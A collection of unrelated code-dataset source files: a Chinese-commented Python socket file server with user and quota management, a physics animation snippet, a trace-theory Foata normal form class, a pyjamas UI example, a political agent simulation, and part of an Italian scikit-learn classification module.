ret_msg==\"1\" or ret_msg==\"注册用户\":\n\n wr_tag=False\n self.__sendmsg(400)#此处是为了让客户端知道下一步应该做什么,发送400 是为了让客户端进入到注册用户的界面\n sign_msg=self.__recvmsg()\n username=sign_msg.get(\"username\")\n password=sign_msg.get(\"password\")\n quotavalue=sign_msg.get(\"quotavalue\")\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_read:\n for line in f_read:\n usr,pad=line.strip('\"').split(\":\")\n if usr==username:\n wr_tag=True\n if wr_tag==False:\n joindir=\"\"\n #此处是为了预防初次操作不存在当前目录#####################\n dirs=(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\").split(\"\\\\\")\n for i in range(0,len(dirs)):\n if len(dirs)==i+1:\n break\n joindir=joindir+dirs[i]+\"\\\\\"\n if os.path.exists(joindir):\n continue\n else:\n os.mkdir(joindir)\n #############################################################\n #将用户名密码写入userauth.txt文件\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"a\") as f:\n f.write(json.dumps(str(username)+\":\"+str(password)))\n f.write(\"\\n\")\n #将配额值写入配额文件\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"a\") as f_quota:\n f_quota.write(json.dumps(str(username)+\":\"+str(quotavalue)))\n f_quota.write(\"\\n\")\n logging.info(\"管理员注册账号成功,账号名:%s,用户默认空间限额:%s\"%(username,quotavalue))\n self.__sendmsg(403)#成功\n else:#此处失败主要是因为存在相同的用户名\n logging.error(\"管理员注册账号失败,账号名:%s\"%username)\n self.__sendmsg(404)#失败\n continue\n elif ret_msg==\"2\" or ret_msg==\"删除用户\":\n user_list=[]#删除用户名使用的列表\n quota_list=[]#删除配额使用的列表\n del_tag=False#表示是否需要删除用户的tag\n quota_tag=False#表示是否需要删除配额值的tag\n self.__sendmsg(405)\n del_username=self.__recvmsg()#接收需要删除的用户名\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"r\") as f_delete:\n #判断是否需要进行删除动作,若需要删除,则del_tag为True\n for line in f_delete:\n delusr,delpad=line.strip('\"').split(\":\")\n if delusr==del_username:\n del_tag=True\n continue\n else:\n user_list.append(line)\n #判断配额值是否需要删除,若需要删除,则quota_tag为True\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_delquota:\n for line2 in f_delquota:\n delusr,delquo=line2.strip('\"').split(\":\")\n if delusr==del_username:\n quota_tag=True\n continue\n else:\n quota_list.append(line2)\n if del_tag and quota_tag:\n with open(base_dir+\"\\\\data\\\\users\\\\UserAuth.txt\",\"w\") as f_rewr:\n for item in user_list:\n f_rewr.write(item)\n logging.info(\"完成删除用户%s\"%delusr)\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"w\") as f_requota:\n for item in quota_list:\n f_requota.write(item)\n logging.info(\"完成删除用户%s磁盘配额\"%delusr)\n self.__sendmsg(401)\n elif quota_tag==False:\n logger.info(\"删除用户%s磁盘配额失败\"%delusr)\n self.__sendmsg(408)\n else:\n logger.error(\"删除用户%s失败,当前用户未注册\"%delusr)\n self.__sendmsg(402)\n else:\n logger.info(\"删除用户%s失败,当前用户文件不存在\"%del_username)\n self.__sendmsg(413)\n elif ret_msg==\"3\" or ret_msg==\"查看用户\":\n seek_list=[]\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_seek:\n #此处发送给客户端的信息主要是配额文件内的信息\n #格式为: 用户名:配额值\n for line in f_seek:\n seek_list.append(line)\n self.__sendmsg(407,data=seek_list)\n\n else:\n self.__sendmsg(407)\n logging.info(\"管理员查询了用户信息\")\n elif ret_msg==\"4\" or ret_msg==\"修改配额\":\n self.__sendmsg(410)\n quota_msg=self.__recvmsg()\n cgqt_list=[]\n qt_value=False\n quota_name=quota_msg.get(\"name\")\n cgqt_value=quota_msg.get(\"value\")\n if os.path.exists(base_dir+\"\\\\data\\\\users\\\\Quota.txt\"):\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"r\") as f_cgvalue:\n for line in f_cgvalue:\n qtname,qtvalue=line.strip(\"\\n\").strip('\"').split(\":\")\n if qtname==quota_name:\n qt_value=True\n qtline=str(qtname)+\":\"+str(cgqt_value)\n cgqt_list.append(qtline)\n continue\n else:\n cgqt_list.append(line.strip(\"\\n\").strip('\"'))\n if qt_value:\n with open(base_dir+\"\\\\data\\\\users\\\\Quota.txt\",\"w\") as f_cgvalue_write:\n for i in range(0,len(cgqt_list)):\n f_cgvalue_write.write('\"'+cgqt_list[i]+'\"')\n f_cgvalue_write.write(\"\\n\")\n self.__sendmsg(411)\n logger.info(\"管理员修改了用户%s的配额值!\"%quota_name)\n else:\n self.__sendmsg(412)\n logger.info(\"修改配额值失败,当前要修改的用户%s不存在\"%quota_name)\n else:\n self.__sendmsg(412)\n logger.info(\"修改配额值失败,当前配额文件不存在\")\n elif ret_msg==\"5\" or ret_msg==\"退出\":\n self.__sendmsg(406)\n logger.info(\"管理员已退出\")\n\n else:\n #103没有特殊含义,仅仅是因为其未分配提示词\n self.__sendmsg(103)\n continue\n #结束连接时\n def finish(self):\n logger.info(\"%s与服务器连接结束。\"%self.ipaddr)\n logger.info(\"=============================================================\")\n\n '''\n # 服务端接受客户端发送过来数据的\n '''\n def __recvmsg(self):\n Rsg_source=self.request.recv(1024)\n Rsg=json.loads(Rsg_source.decode())\n return Rsg\n\n\n def __changemsg(self):\n '''\n 此函数为登录成功后客户端与服务器相互交互的函数,客户端发送相关指令给服务器,服务器根据指令分配相应函数完成。\n :return:\n '''\n while True:\n try:\n self.chmsg=self.__recvmsg()\n if self.chmsg.get(\"Type\")==\"pwd\":\n #运行pwd函数\n self.__pwd()\n elif self.chmsg.get(\"Type\")==\"cd\":\n self.__cd()\n elif self.chmsg.get(\"Type\")==\"ls\":\n self.__ls()\n elif self.chmsg.get(\"Type\")==\"put\":\n self.__put()\n elif self.chmsg.get(\"Type\")==\"get\":\n self.__get()\n elif self.chmsg.get(\"Type\")==\"mkdir\":\n self.__mkdir()\n elif self.chmsg.get(\"Type\")==\"rm\":\n self.__rm()\n elif self.chmsg.get(\"Type\")==\"bye\":\n self.__bye()\n else:\n self.__help()\n except:\n logger.info(\"客户端%s已断开连接\"%self.ipaddr)\n break\n\n def __ls(self):\n '''\n #此处为遍历当前目录下所有的文件夹和文件,然后返回。\n #若当前目录为空,则不会返回data数据,客户端可据此进行判断“当前目录为空”\n :return:\n '''\n ls_send_list=[]\n if self.chmsg.get(\"Type\") is not None:\n ls_send_list=self.__walk()\n logger.info(\"用户%s遍历了目录,目录名为%s\"%(self.username,self.dest.strip(\"\").split(\"\\\\\")[-1]))\n self.__sendmsg(103,data=ls_send_list)\n\n def __walk(self):\n '''\n #此处遍历当前目录,找出所在文件夹的子文件夹和文件列表,并返回相应的列表,格式为 [[文件夹列表],[文件列表]]\n :return: 返回的是当前文件夹下存在的文件夹名和文件名的列表\n '''\n c=0\n search_list=[]\n ls_list=os.walk(self.dest)\n for item in ls_list:\n for item2 in item:\n if c==0:\n c+=1\n continue\n search_list.append(item2)\n if c==1:\n break\n return search_list\n\n def __cd(self):\n '''\n #执行目录切换动作的函数\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n dest=self.chmsg[\"dest\"]\n #将全局的self.dest赋值到本函数内的this_dest,确保调用。\n this_dest=self.dest\n # this_tag=False\n #此处只是获取search_walk返回的文件夹列表##\n floder_list=(self.__walk())#[0]\n file_list=floder_list[0]\n ###########################################\n if dest in file_list:\n self.dest=this_dest+\"\\\\\"+dest\n self.__sendmsg(109)\n logger.info(\"用户%s已将目录切换至%s\"%(self.username,self.dest))\n #若使用“..”进行文件夹切换,可返回至上层目录。\n #此处会进行判断是否切换的目录超过权限,若超过,则维持原目录,即最高可切换至以用户名命名的文件夹。\n elif dest==\"..\":\n #如果切换越权,维持原目录\n if self.dest==HomeDocs+\"\\\\\"+self.username+\"\\\\\" or self.username not in self.dest.split(\"\\\\\"):\n self.dest=HomeDocs+\"\\\\\"+self.username\n logger.error(\"用户%s指定切换的目录越权,无法完成切换。\"%self.username)\n self.__sendmsg(111)\n #如果没有越权,则执行切换,将字符串切割以后舍弃最后一个。\n # elif HomeDocs+\"\\\\\"+self.username in self.dest:\n else:\n dest_list=self.dest.split(\"\\\\\")\n new_dest=\"\"\n for i in range(0,len(dest_list)):\n if len(dest_list)==i+1:\n break\n new_dest=new_dest+dest_list[i]+\"\\\\\"\n #执行完成切换以后,将已经变动的当前文件路径重新赋值给全局的self.dest,算是告知所有协同工作的函数\n self.dest=new_dest.strip(\"\\\\\")\n logger.info(\"用户%s切换目录至上一级%s\"%(self.username,self.dest))\n self.__sendmsg(110)\n else:\n logger.error(\"用户%s切换目录至%s失败,服务器不存在此目录\"%(self.username,dest))\n self.__sendmsg(108)\n\n def __pwd(self):\n '''\n #此为查看当前所在位置的函数\n :return:\n '''\n send_list=\"\"\n send_tag=False\n if self.chmsg.get(\"Type\") is not None:\n dest_list=self.dest.split(\"\\\\\")\n for item in dest_list:\n if item!=\"\":\n if item==self.username:\n send_tag=True\n if send_tag==True:\n send_list=send_list+item+\"\\\\\"\n logger.info(\"用户:%s查询了当前所在目录:%s\"%(self.username,send_list))\n self.__sendmsg(103,data=send_list)\n\n\n def __mkdir(self):\n '''\n #此为执行创建目录的函数\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n mkname=self.chmsg.get(\"mkname\")\n if os.path.exists(self.dest+\"\\\\\"+mkname):\n logger.error(\"指定创建的目录已存在,无法创建\")\n self.__sendmsg(112)\n else:\n #在创建目录的过程中,此处判断是否存在路径上没有的目录,若目录上没有,则会一块创建。\n dirs=self.dest.split(\"\\\\\")\n dirs.append(mkname)\n res_item=\"\"\n for item in dirs:\n res_item=res_item+item+\"\\\\\"\n if os.path.exists(res_item):\n pass\n else:\n os.mkdir(res_item)\n self.__sendmsg(113)\n logger.info(\"用户%s创建文件夹%s成功\"%(self.username,self.chmsg.get(\"mkname\")))\n\n\n def __rm(self):\n '''\n #此为执行移除文件或者文件夹的函数\n #需要判断移除的是文件还是文件夹,第一遍循环的是文件夹,第二遍循环的是文件\n #在删除文件夹的时候,若文件夹内有文件,使用os.rmdir()无法移除文件夹,会直接报错\n #使用shutil.rmtree则可以直接全部删除\n :return:\n '''\n if self.chmsg.get(\"Type\") is not None:\n c=0\n tag=False\n rmname=self.chmsg.get(\"rmname\")\n file_list=self.__walk()\n for item in file_list:\n if rmname in item and c==0:\n if os.path.exists(self.dest+\"\\\\\"+rmname):\n try:\n shutil.rmtree(self.dest+\"\\\\\"+rmname)\n logger.info(\"文件夹%s已被用户%s删除\"%(rmname,self.username))\n self.__sendmsg(114)\n except:\n logger.error(\"文件夹%s删除异常,未能成功处理\"%rmname)\n self.__sendmsg(118)\n else:\n logger.error(\"指定删除的文件夹不存在,无法完成删除\")\n self.__sendmsg(115)\n tag=True\n #在循环第一遍的时候,因为c=0,因此无法执行此函数,只有在循环的第二遍的时候,才会进入此判断\n elif rmname in item and c==1:\n if os.path.isfile(self.dest+\"\\\\\"+rmname):\n try:\n os.remove(self.dest+\"\\\\\"+rmname)\n self.__sendmsg(116)\n logger.error(\"文件%s已被用户%s删除\"%(rmname,self.username))\n except:\n logger.error(\"文件%s删除异常,未能成功处理\"%rmname)\n self.__sendmsg(118)\n else:\n logger.error(\"指定删除的文件不存在,无法完成删除\")\n self.__sendmsg(117)\n tag=True\n c+=1\n if tag==False:\n logger.error(\"指定删除的文件不存在,无法完成删除\")\n self.__sendmsg(117)\n #################执行删除动作以后,重新计算当前用户目录下的文件大小####################\n self.allsize=0\n for size_path,size_dirs,size_files in os.walk(HomeDocs+\"\\\\\"+self.username):\n for item in size_files:\n self.allsize=self.allsize+int(os.path.getsize(os.path.join(size_path,item)))\n ########################################################################################\n\n def __put(self):\n '''\n ##执行上传动作的函数#\n :return:\n '''\n recv_len=0#已经收到的长度\n tag=False#tag 是用来判断是否有必要执行下一步的,如果此文件名存在于服务器,那么不接受再次传入。\n filename=self.chmsg[\"filename\"]#取得发送过来的文件名\n if \"\\\\\" in filename:#此处是为了判断发送过来的文件是否携带路径,若携带路径,则对字符串进行切割提取。\n filename=(filename.split(\"\\\\\"))[-1]\n size=self.chmsg[\"size\"]#取得发送过来的文件大小\n md5=self.chmsg[\"md5\"]#取得文件发送过来的md5值\n exist_list=self.__walk()\n #md5值的计算\n file_md5 = hashlib.md5()\n ##################\n for existname in exist_list:\n if len(existname)!=0:\n if filename in existname:\n tag=True#tag为真,证明文件存在,若还需要传输,则需要进行md5值的比较。\n ########################此处计算已经存在文件的size加上需要上传的文件的size###########\n self.allsize=int(self.allsize)+int(size)\n #存在的文件加要上传的文件如果没超过限定值,开始接受传输。\n if self.qtvl>=self.allsize:\n #如果tag为Flase, 则证明服务器端原本就没有此文件,那么此文件就以新文件形式处理。\n if tag==False:\n #服务器向客户端发出继续发送的指令。\n self.__sendmsg(102,data=\"continue\")\n filename_stream=open(self.dest+\"\\\\\"+filename,\"wb\")\n while True:\n ############循环接受数据传输##################\n try:\n if recv_len= 399.8:\r\n rotations += 1\r\n\r\n #Update variable outputs\r\n time.text = \"Time: %1.f\" % t + \" seconds\"\r\n nmrRotations.text = \"Rotation: %1.f\" % rotations\r\n ballPosX.text = \"Ball.pos.x: %1.f\" % ball.pos.x\r\n ballPosY.text = \"Ball.pos.y: %1.f\" % ball.pos.y","sub_path":"Physics_Ex02.py","file_name":"Physics_Ex02.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461112248","text":"import os\nimport settings\nimport graphviz\n\nos.environ[\"PATH\"] += os.pathsep + settings.graphviz_path\n\n\nclass Trace:\n __MARKER = chr(int('E000', base=16)) # private use area of unicode\n\n def __init__(self, alphabet, independence, word):\n # attributes\n self.alphabet = alphabet\n self.independence = independence\n self.word = word\n self.dependence = None\n self.foata_normal = None\n self.graph_edges = None\n self.graph_labels = None\n\n # input correctness check\n for letter in self.word:\n if letter not in self.alphabet:\n raise Exception(f'Letter {letter} of word not in alphabet.')\n\n for pair in self.independence:\n if (pair[1] + pair[0]) not in self.independence:\n raise Exception('Independence relation is not symmetric.')\n\n for letter in self.alphabet:\n if 2 * letter in self.alphabet:\n raise Exception('Independence relation is not anti-reflexive.')\n\n # compute other trace forms\n self.dependence = self.calculate_dependence()\n self.foata_normal = self.compute_Foata_Normal_Form()\n self.compute_dependency_graph()\n\n def calculate_dependence(self):\n dependence = set()\n for first in self.alphabet:\n for second in self.alphabet:\n pair = first + second\n if pair not in self.independence:\n dependence.add(pair)\n\n return dependence\n\n def trace_equiv_class(self):\n old = {self.word}\n new = set()\n\n while True:\n for word in old:\n for i in range(len(word) - 1):\n if word[i:i + 2] in self.independence:\n new.add(\n word[:i] + word[i + 1] + word[i] + word[i + 2:])\n if old == new:\n break\n else:\n old = new.copy()\n\n return old\n\n # noinspection PyPep8Naming\n def compute_Foata_Normal_Form(self):\n \"\"\"\n There is a stack for every letter from the alphabet.\n\n Algorithm goes as follows:\n\n 0) Read the word in reversed order and for each letter\n put it on stack assigned to this letter and on every stack\n assigned to letters in dependency relation with currently\n processed letter put marker.\n\n 1) If all stacks are empty, then end.\n\n 2) Let S be the set of letters, which are at the top of stacks.\n For every letter that is in dependency relation with any\n letter from S, remove element from the top of the stack\n assigned to this letter. Go to step 1).\n\n \"\"\"\n stacks = {letter: list() for letter in self.alphabet}\n stacks_sizes = {letter: 0 for letter in self.alphabet}\n\n # Prepare all stacks corresponding to given letter.\n for letter in reversed(self.word):\n for other_letter in self.alphabet:\n pair = letter + other_letter\n if pair in self.dependence:\n stacks_sizes[other_letter] = stacks_sizes[other_letter] + 1\n if letter != other_letter:\n stacks[other_letter] += [self.__MARKER]\n else:\n stacks[letter] += [letter]\n\n normal_form = ''\n step = []\n\n while True:\n # Get letters from tops of stacks.\n for stack in stacks.values():\n if stack:\n if stack[-1] != self.__MARKER:\n step += [stack[-1]]\n\n # Remove dependent elements.\n for element in step:\n for letter in self.alphabet:\n pair = element + letter\n if pair in self.dependence:\n stacks[letter].pop()\n\n if step:\n normal_form += '(' + ''.join(sorted(step)) + ')'\n step = []\n else:\n break\n\n return normal_form\n\n def compute_dependency_graph(self):\n labels = []\n edges = []\n\n for i in range(len(self.word)):\n labels += [self.word[i]]\n for j in range(len(labels) - 1):\n pair = labels[j] + self.word[i]\n if pair in self.dependence:\n edges += [(j, i)]\n\n self.graph_edges = edges\n self.graph_labels = labels\n\n # delete redundant edges\n for v in range(len(labels)):\n self.__bfs_redundant_removal(v)\n\n def __bfs_redundant_removal(self, source):\n queue = [source]\n\n reachability_counter = [0] * len(self.graph_labels)\n\n while queue:\n node, queue = queue[0], queue[1:]\n\n for edge in self.graph_edges:\n if edge[0] == node:\n if reachability_counter[edge[1]] == 0:\n queue += [edge[1]]\n reachability_counter[edge[1]] += 1\n\n self.graph_edges = [edge for edge in self.graph_edges if not (\n edge[0] == source and reachability_counter[edge[1]] > 1\n )]\n\n def __topological_sort(self):\n nodes_list = []\n visited = [False] * len(self.graph_labels)\n\n for v in list(range(len(self.graph_labels))):\n if not visited[v]:\n self.__dfs(v, nodes_list, visited)\n\n return list(reversed(nodes_list))\n\n def __dfs(self, node, nodes_list, visited):\n visited[node] = True\n\n for edge in self.graph_edges:\n if edge[0] == node and not visited[edge[1]]:\n self.__dfs(edge[1], nodes_list, visited)\n\n nodes_list.append(node)\n\n def graph_to_foata(self):\n topological_nodes = self.__topological_sort()\n max_dist = [0] * len(topological_nodes)\n\n for v in topological_nodes:\n for edge in self.graph_edges:\n if edge[1] == v and max_dist[v] <= max_dist[edge[0]]:\n max_dist[v] = max_dist[edge[0]] + 1\n\n distances = set(max_dist)\n classes = ['' for _ in range(len(distances))]\n for dist in distances:\n class_elements = [self.graph_labels[i] for i in\n range(len(max_dist))\n if max_dist[i] == dist]\n classes[dist] = ''.join(sorted(class_elements))\n\n return ''.join(list(map(lambda x: '(' + x + ')', classes)))\n\n def save_graph_to_file(self, filename='graph_results/graph', file_format='jpeg'):\n \"\"\" Save graph to file in graphviz format and as an image\n\n :param filename: string containing a name of file to which the graph will be saved\n :param file_format: string with format information e.g. 'png', 'svg', 'jpeg', ...\n :return:\n \"\"\"\n graph = graphviz.Digraph('G', filename=filename, format=file_format)\n for i, label in enumerate(self.graph_labels):\n graph.node(str(i), label=label)\n\n for edge in self.graph_edges:\n graph.edge(str(edge[0]), str(edge[1]))\n\n try:\n graph.render()\n except graphviz.ExecutableNotFound as e:\n print(\"Make sure you have Graphviz executables (not only python library) and that they are on systems' \"\n \"PATH.\\n\"\n \"If you have executables, the only thing to do is to put path to them into settings.py.\")\n print(\"Exception message:\")\n print(e)\n\n def __str__(self):\n return '[' + self.word + ']'\n\n def __repr__(self):\n return 'Trace(' + self.word + ')'\n","sub_path":"src/main/lab10/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"327599038","text":"from pyjamas.ui import RootPanel, HTML, Label, HasAlignment, Button\nfrom pyjamas import Window\n\nfrom pyjamas.vertsplitpanel import VerticalSplitPanel\n\nclass SplitPanel:\n\n def onModuleLoad(self):\n self.panel=VerticalSplitPanel()\n \n self.panel.setSize(\"500px\", \"350px\")\n self.panel.setSplitPosition(\"30%\")\n\n randomText = \"\"\n for i in range(200):\n randomText += \"hello \"\n\n self.panel.setTopWidget(HTML(randomText))\n self.panel.setBottomWidget(HTML(randomText))\n\n RootPanel().add(self.panel)\n","sub_path":"pyjamas-khtml/examples/splitpanel/SplitPanel.py","file_name":"SplitPanel.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442135536","text":"\"\"\"\nImmutable:\n Age: (0-100)\n Genders: Male, Female\n Sex Preference: Heterosexual, Homosexual\n\nMutable:\n Apathy: (0-10)\n Political Participating: True, False\n\n Education: Illiterate, Middleschool, Highschool, Higher Education\n Occupation: Blue Collar, White Collar, Academic, Unemployed\n Class: Working, Middle, Upper\n Married: True, False\n Parent: True, False\n Location: Urban, Rural, Suburban\n\n (TODO) Religion: Protestant, Catholic, Mormon, Jewish, Sunni, Shia, Hindu, Shinto, Neopagan, Buddhist, Other\n Religiosity: (0-10)\n\nIdeology:\n Socialism: (0-10)\n Libertarianism: (0-10)\n Conservatism: (0-10)\n Traditionalism: (0-10)\n Chauvinism: (0-10)\n\"\"\"\n\nfrom enum import Enum\nfrom random import randint\nfrom random import getrandbits\nimport numpy as np\n\nfrom Issue import *\nfrom Policy import *\n\nclass Gender(Enum):\n male = 0\n female = 1\n\nclass Sex_Preference(Enum):\n heterosexual = 0\n homosexual = 1\n\nclass Education(Enum):\n no_highschool = 0\n highschool = 1\n higher = 2\n\nclass Occupation(Enum):\n bluecollar = 0\n whitecollar = 1\n academic = 2\n unemployed = 3\n\nclass Political_Class(Enum):\n working = 0\n middle = 1\n upper = 2\n\nclass Location(Enum):\n urban = 0\n rural = 1\n\nclass Agent(object):\n\n def __init__(self):\n self.applied_policies = []\n\n self.traits = {}\n\n self.traits['alive'] = True\n self.traits['imprisoned'] = weighted_random([(99,0),(1,1)])\n\n self.traits['gov_opinion'] = np.random.beta(2,2)*20-10\n\n self.traits['age'] = ageRand()\n self.traits['gender'] = Gender(randint(0,1))\n self.traits['sex_preference'] = Sex_Preference(weighted_random([(96,0),(4,1)]))\n\n self.traits['apathy'] = int(abs(np.random.normal(4,2)))\n self.traits['participating'] = bool(getrandbits(1))\n\n self.traits['education'] = Education(weighted_random([(9,0),(57,1),(34,2)]))\n self.traits['occupation'] = Occupation(randint(0,3))\n self.traits['political_class'] = Political_Class(randint(0,2))\n self.traits['married'] = bool(getrandbits(1))\n self.traits['parent'] = bool(getrandbits(1))\n self.traits['location'] = Location(weighted_random([(81,0),(19,1)]))\n\n self.traits['radicalism'] = abs(np.random.normal(2,2))\n\n self.traits['conservatism-progressivism'] = np.random.beta(2,2)*20-10\n self.traits['capitalism-socialism'] = np.random.beta(2,2)*20-10\n self.traits['traditionalism-secularism'] = np.random.beta(2,2)*20-10\n self.traits['authoritarianism-libertarianism'] = np.random.beta(2,2)*20-10\n self.traits['chauvinism-humanism'] = np.random.beta(2,2)*20-10\n\n def setBase(self):\n self.traitsBase = dict(self.traits)\n\n def addIssue(self, issue):\n issue.apply(self.traits)\n\n def addPolicy(self, policy, option):\n policy.apply(self.traits, option)\n for effect in policy.options[option].effects:\n if effect[0](self.traits):\n self.applied_policies.append((policy.name, effect))\n\n def update(self):\n self.traits = self.traitsBase\n for policy in self.applied_policies:\n for key, value in policy[1].items():\n self.traits[key] += value\n\n def printStats(self):\n for key, value in sorted(self.traits.items(), key=lambda tup: tup[0]):\n print(key + ': ' + str(\"%.2f\"%value))\n\n def printDif(self):\n for key, value in sorted(self.traits.items(), key=lambda tup: tup[0]):\n if not value is self.traitsBase[key]:\n print(key + ': ' + str(\"%.2f\"%self.traitsBase[key]) + ' -> ' + str(\"%.2f\"%value))\n\ndef weighted_random(pairs):\n total = sum(pair[0] for pair in pairs)\n r = randint(1, total)\n for (weight, value) in pairs:\n r -= weight\n if r <= 0: return value\n\ndef ageRand():\n s1 = np.random.uniform(low=0,high=50,size=2)\n s2 = np.random.triangular(left=50,mode=50,right=100,size=1)\n return int(round(np.concatenate((s1, s2)).item(np.random.choice(3))))\n","sub_path":"Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301329164","text":"# coding=utf-8\n\"\"\"Il modulo SKLearn contiene tutte gli algoritmi di ML necessari\"\"\"\nfrom __future__ import print_function\nimport random\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\", message=\"elementwise comparison failed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"Duplicate key in file\")\nwarnings.filterwarnings(\"ignore\", message=\"Variables are collinear\")\nwarnings.filterwarnings(\"ignore\", message=\"Precision and F-score are ill-defined\")\n\nimport re\nfrom sklearn.metrics import confusion_matrix as conf_matr\nfrom sklearn.metrics import accuracy_score\nfrom imblearn.over_sampling import RandomOverSampler, ADASYN, SMOTE\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn import preprocessing\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold\nfrom subprocess import call\nimport os\nfrom sklearn import tree as tr\nfrom sklearn.metrics import classification_report\nimport numpy as np\nimport os.path\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.cluster import KMeans\nnp.set_printoptions(threshold=np.nan)\nimport time\n\n\ndef LabelEncoder(dataset, target, header, risk_level, dataset_name, force_encoding=False):\n \"\"\"\nLabelEncoder effettua il Label Encoding del dataset e del target in ingresso\n :param dataset: il dataset di cui si vuole effettuare il Label Encoding\n :param target: il target di cui si vuole effettuare il Label Encoding\n :param header: header del CSV file\n :param risk_level: il livello per cui si vuole effettuare la classificazione\n :param dataset_name: il nome del dataset\n :param force_encoding: indica se si vuol forzare l'encoding del dataset, non tenendo conto delle codifiche precedenti già salvate sui file della cartella labels\n :return force_encoding: dataset in cui è stato effettuato il label Encoding\n :return target: target in cui è stato effettuato il label Encoding\n :return dataset_encoder: contiene un dictionary [index, label] associato all'encoding\n :return target_encoder: contiene tutte le label del target\n \"\"\"\n\n index_dict = 0\n labels = dict()\n\n\n column_index = 0\n # Creo i file e la cartella in cui verrà salvato l'encoding.\n # Tale operazione è utile per velocizzare le operazioni di encoding successive.\n directory = './labels/'\n filename_enc = directory + \"encoding_\" + risk_level + \"_\" + os.path.basename(dataset_name).split(\".csv\")[\n 0] + \"_\" + str(len(dataset)) + \".npy\"\n filename_dataset = directory + \"enc_data_\" + risk_level + \"_\" + os.path.basename(dataset_name).split(\".csv\")[\n 0] + \"_\" + str(len(dataset)) + \".npy\"\n if os.path.exists(directory) == False:\n os.mkdir(directory)\n total_column = float(len(dataset[0]))\n\n # Capisco quali sono gli indici delle date che dovrò convertire dal formato del CSV al formato yyyy/mm/dd.\n # Tale formato è utile per l'ordinamento.\n\n date_i_1 = -1\n date_i_2 = -1\n date_i_3 = -1\n date_i_4 = -1\n for i in range(0, len(header)):\n if header[i] == 'DINZI_VLDT_GRZI':\n date_i_1 = i\n if header[i] == 'DFINE_VLDT_GRZI':\n date_i_2 = i\n if header[i] == 'data_prima_immatricolazione':\n date_i_3 = i\n if header[i] == 'data_ultima_voltura':\n date_i_4 = i\n\n # Se non esistono i file di encoding o forzo l'encoding, sono costretto ad eseguirlo.\n if os.path.exists(filename_enc) == False or os.path.exists(filename_dataset) == False or force_encoding == True:\n # Estraggo tutti i dati colonna per colonna\n for column in dataset.T:\n column_labels = dict()\n print(\"\\rEncoding: \" + str(int((column_index / total_column) * 100)) + \"%\", end=\"\")\n # Salvo in tmp_labels tutti i dati differenti all'interno di una colonna, cosi' da poter associare ad essi un numero\n tmp_labels = []\n for row in column:\n if column_index == date_i_1 or column_index == date_i_2 or column_index == date_i_3 or column_index == date_i_4:\n row = to_num_date(row)\n if tmp_labels.__contains__(row) == False:\n tmp_labels.append(row)\n # Ordino i dati. Tale ordinamento è utile per algoritmi come l'albero di decisione,\n # il cui funzionamento è basato su criteri di split del tipo <= e >\n tmp_labels = sorted(tmp_labels)\n # Associo ad ogni label un numero\n for row in tmp_labels:\n column_labels[index_dict] = row\n labels[index_dict] = row\n index_dict = index_dict + 1\n # Converto il dataset\n for i in range(0, len(dataset)):\n if column_index == date_i_1 or column_index == date_i_2 or column_index == date_i_3 or column_index == date_i_4:\n label = to_num_date(dataset[i, column_index])\n else:\n label = dataset[i, column_index]\n dataset[i, column_index] = get_key(column_labels, label)\n column_index = column_index + 1\n print(\"\\rEncoding: 100 %\")\n # Salvo l'encoding\n dataset = np.array(dataset).astype(np.int)\n np.save(filename_enc, labels)\n np.save(filename_dataset, dataset)\n else:\n labels = np.load(filename_enc).item()\n dataset = np.load(filename_dataset)\n\n # Eseguo il Label Encoding per il target.\n # In tal caso posso sfruttare il LabelEncoder di SKLearn perchè non ho problemi di ordinamento.\n target_encoder = preprocessing.LabelEncoder()\n target_encoder.fit(target)\n target = target_encoder.transform(target)\n print(\"\\rEncoding: 100%\", end=\"\")\n print(\"\\nDone!\")\n return dataset, np.array(target).astype(np.int), labels, target_encoder.classes_\n\n\ndef cross_validation(dataset, target, dataset_name, n_fold=2, labels=None,\n risk_level=None, percentage=-1, n_cluster=5, cluster_both_class=True):\n \"\"\"\ncross_validation effettua la stratified cross validation sul dataset specificato come parametro.\nEssa contiene al suo interno 7 algoritmi che vengono combinati al fine di aumentare le prestazioni.\nDi default utilizza la miglior configurazione possibile per ogni livello di rischio, ma 